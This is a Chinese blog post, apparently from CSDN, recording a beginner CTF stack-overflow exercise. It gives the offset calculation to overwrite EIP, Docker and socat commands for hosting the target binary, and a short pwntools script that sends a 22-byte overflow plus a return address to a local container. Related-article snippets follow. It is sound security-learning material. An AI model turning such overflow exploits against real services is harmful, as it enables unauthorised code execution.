77:栈溢出练习

最新推荐文章于 2022-05-26 18:19:42 发布
最新推荐文章于 2022-05-26 18:19:42 发布
阅读量184 收藏
点赞数
分类专栏: pwn入门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41858371/article/details/104336128
版权

没啥好写的,直接给个链接,这位师傅讲的很详细了,适合入门的人学习。
这位师傅太赞了。。。
https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42241&page=1
在这里插入图片描述简单说一下怎么静态分析的。当然适合一定基础的人。
call的时候会push EIP,进入call之后首先push ebp,然后将此时的栈顶esp的值给了ebp,然后读取的是ebp+buf而,buf是ebp-12,所以可以分析出来存放eip的地方到存放输入字符的地方有12h+4=16h=22的长度,所以要覆盖eip只需要输入超过22个长度即可。

记录一下docker的一些命令吧。。。

//导入镜像:docker import - ubuntu/17.04.amd64
//运行镜像:docker run -it -p 23946:23946 ubuntu/17.04.amd64 /bin/bash
  会创建一个docker容器,第一个端口是宿主机的端口,第二个是容器的端口
//列出容器:docker container ls -a
//容器重命名:docker container rename old_name new_name
//打开容器的shell:docker exec -it container_name /bin/bash
//启动容器:docker start container_name
//复制:docker container cp file_name container_name:/root
//linux命令,将指定程序在指定端口运行:
socat tcp-listen:10001,reuseaddr,fork EXEC:./file_name,pty,raw,echo=0

记录pwntools的代码

from pwn import *

io = remote('172.17.0.2', 10001)
payload = '1' * 22 + p32(0x0804846B)
io.send(payload)    #发送payload到程序
io.interactive()	      #和程序进行交互
S1lenc3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
简单的栈溢出_hello_elf
Hvnt3r的博客
03-06 574
简单的栈溢出_hello_elf 原文地址:https://hvnt3r.top/2018/09/%E7%AE%80%E5%8D%95%E7%9A%84%E6%A0%88%E6%BA%A2%E5%87%BA-hello-elf/ 最近哥们问了我一道PWN题,觉得比较有代表性而且难度较低,就记录下来以作栈溢出的示例,仅从新手角度分析,大牛绕过 题目地址:https://pan.baidu.com/s...
stackoverflowerror解决_StackOverFlowError 常见原因及解决方法
weixin_35705784的博客
01-25 5395
点击上方"IT牧场",选择"设为星标"技术干货每日送达!每一个 JVM 线程都拥有一个私有的 JVM 线程栈,用于存放当前线程的 JVM 栈帧(包括被调用函数的参数、局部变量和返回地址等)。如果某个线程的线程栈空间被耗尽,没有足够资源分配给新创建的栈帧,就会抛出java.lang.StackOverflowError错误。线程栈是如何运行的?首先给出一个简单的程序调用代码示例,如下所...
栈溢出脚本_CTF必备技能丨Linux Pwn入门教程——栈溢出基础(文末有彩蛋)
weixin_39723248的博客
11-20 225
这是一套Linux Pwn入门教程系列,作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的一些题目和文章整理出一份相对完整的Linux Pwn教程。课程回顾>>Linux Pwn入门教程第一章:环境配置更多Pwn视频课程本系列教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,式化字符串,条件竞争等进行介绍,所有环境都会...
Linux栈溢出例子详解
weixin_39833509的博客
03-16 1459
注:本例中使用的例子为看雪论坛帖子中的例子(https://bbs.pediy.com/thread-216868.htm),结合自己的理解,进行更深入的详细的讲解,更有利于理解细节! 例子中的代码如下: //vuln.c #include <stdio.h> #include <string.h> int main(int argc, char* argv[]) { /*...
Exploit编写教程1:栈溢出
周无争的博客
05-26 2194
Exploit编写教程1:栈溢出 要点提示: 复现环境首选 WinXP,因为没有 地址随机化ASLR,可以减少复现难度。ASLR在 Vista以上版本才有。 用到的工具有:python3\pwntools\windbg\x32dbg\msfvenom 造成崩溃后查看EIP是否为目标地址,使用 d esp 查看栈中的数据。 直接使EIP指向ESP不会有效果,要使EIP指向 jmp esp 指令的地址。 查看软件加载的DLL所在的地址范围,再使用 s 1a800000 l 1f200000 ff e4 查询该
exploit编写教程2:栈溢出,跳转至shellcode
xiaoeryu_的博客
03-18 1203
exploit编写教程2:栈溢出,跳转至shellcode 这篇blog是为了学习如何用各种方式去构造栈溢出类型漏洞的exp 执行shellcode的多种方法: jump/call 寄存器 pop return push return jmp[reg + offset] blind return jmp code SHE call 1. jmp/call 寄存器 在第一篇中已经详细分析过 2. pop pop ret 这个exp我们依然还使用上一篇分析的Easy RM to MP3的漏洞来编写,在上一
栈溢出原理及解题练习
weixin_44222568的博客
04-15 1895
一个小白的慢慢理会过程
android 栈溢出 检查,Android栈溢出漏洞利用练习
weixin_42208901的博客
05-31 160
按照以下改动修改linker代码,重新编译ROMdiff --git a/linker/linker.cpp b/linker/linker.cppindex c78b9aba6..d20995162 100644--- a/linker/linker.cpp+++ b/linker/linker.cpp@@ -1493,13 +1493,13 @@ static bool find_librar...
pwn入门之栈溢出练习
dfdhxb995397的博客
09-10 918
本文原创作者:W1ngs,本文属i春秋原创奖励计划,未经许可禁止转载!前言:最近在入门pwn的栈溢出,做了一下jarvisoj里的一些ctf pwn题,感觉质量都很不错,难度循序渐进,把自己做题的思路和心得记录了一下,希望能给入门pwn的朋友带来点帮助和启发,大牛轻喷题目链接:https://www.jarvisoj.com/challenges1、level0(64位)代码<ig...
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
leetcode:一些基本练习
04-04
- **递归与迭代**:两种解决问题的方法,递归简洁但可能引发栈溢出,迭代更安全但代码可能更复杂。 - **动态规划**:解决最优化问题的有效手段,通常涉及状态转移方程。 3. **C++在LeetCode中的应用**: - **STL...
春节7天练丨Day2:栈、队列和递归1
08-03
- **数组实现顺序栈**:利用数组的下标访问,但要注意溢出问题,可以预设容量或动态扩展。 - **链表实现链式栈**:每个节点包含元素和指向下一个节点的指针,灵活性高,但插入和删除操作较数组慢。 - **数组实现顺序...
ES6-practice:es6功能练习
05-25
尾调用是指在函数的最后一步调用另一个函数,ES6规定在满足一定条件时,编译器可以优化尾调用,避免栈溢出。 以上是ES6中的主要特性,通过ES6-practice项目,你可以通过实践加深对这些特性的理解和运用。同时,不断...
Codility:协调性练习的解决方案
04-27
Java支持这两者,但递归可能导致栈溢出,而迭代通常更节省内存。 8. **多线程**:在Java中,多线程是处理并发问题的重要手段。通过Thread类和ExecutorService,可以实现并发操作,提高程序效率。 9. **单元测试**...
基于Python flask 的豆瓣电影top250数据评分可视化
08-03
基于Python flask 的豆瓣电影top250数据评分可视化
基于stm32的汇川伺服电机机械臂控制程序,C语言程序,串口通信
08-03
基于stm32的汇川伺服电机机械臂控制程序,C语言程序,串口通信
MQTTX-Setup-1.9.9-x64.exe
08-03
主要是MQTT的软件安装包
MES产品化-中央空调场内物流培训.pptx
最新发布
08-03
MES产品化-中央空调场内物流培训.pptx
数据结构练习:栈、队列、串、数组与广义表、树和二叉树
- 当两个栈共享同一块内存空间时,为了优化空间利用率,可以将栈底设置在内存的两端,这样可以减少溢出的可能性。 8. **栈的输出序列**: - 栈的输出序列取决于元素的入栈顺序和出栈顺序,如果栈的输入序列为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值